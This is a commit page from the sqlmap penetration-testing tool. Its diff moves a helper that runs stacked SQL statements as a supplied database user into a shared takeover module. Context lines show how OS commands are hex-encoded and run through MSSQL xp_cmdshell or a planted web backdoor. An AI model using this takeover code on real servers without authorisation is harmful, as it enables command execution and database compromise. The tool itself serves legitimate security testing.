sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-04-26 11:53:44 +03:00
Code Issues Packages Projects Releases Wiki Activity

make the runAsDBMSUser() generic and ported to abstraction.py so the same function will be used for PostgreSQL dblink() too

Browse Source
This commit is contained in:
Bernardo Damele 2012-07-02 02:14:03 +01:00
parent 6697927098
commit add8352804
2 changed files with 17 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
lib/takeover/abstraction.py
View File

@ -16,6 +16,7 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.settings import SQL_STATEMENTS
from lib.core.shell import autoCompletion from lib.core.shell import autoCompletion
from lib.request import inject from lib.request import inject
from lib.takeover.udf import UDF from lib.takeover.udf import UDF
@ -37,6 +38,21 @@ class Abstraction(Web, UDF, xp_cmdshell):
Web.__init__(self) Web.__init__(self)
xp_cmdshell.__init__(self) xp_cmdshell.__init__(self)
def runAsDBMSUser(self, query):
if conf.dCred:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT 1;%s" % query
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
def execCmd(self, cmd, silent=False): def execCmd(self, cmd, silent=False):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
self.webBackdoorRunCmd(cmd) self.webBackdoorRunCmd(cmd)

18
lib/takeover/xp_cmdshell.py
View File

@ -21,7 +21,6 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS from lib.core.enums import HASHDB_KEYS
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.settings import SQL_STATEMENTS
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.request import inject from lib.request import inject
@ -148,21 +147,6 @@ class xp_cmdshell:
if cmd: if cmd:
self.xpCmdshellExecCmd(cmd) self.xpCmdshellExecCmd(cmd)
def xpCmdshellForgeRunAs(self, query):
if conf.dCred:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT 1;%s" % query
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
def xpCmdshellForgeCmd(self, cmd): def xpCmdshellForgeCmd(self, cmd):
self.__randStr = randomStr(lowercase=True) self.__randStr = randomStr(lowercase=True)
self.__cmd = "0x%s" % hexencode(cmd) self.__cmd = "0x%s" % hexencode(cmd)
@ -170,7 +154,7 @@ class xp_cmdshell:
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return self.xpCmdshellForgeRunAs(self.__forgedCmd) return self.runAsDBMSUser(self.__forgedCmd)
def xpCmdshellExecCmd(self, cmd, silent=False): def xpCmdshellExecCmd(self, cmd, silent=False):
cmd = self.xpCmdshellForgeCmd(cmd) cmd = self.xpCmdshellForgeCmd(cmd)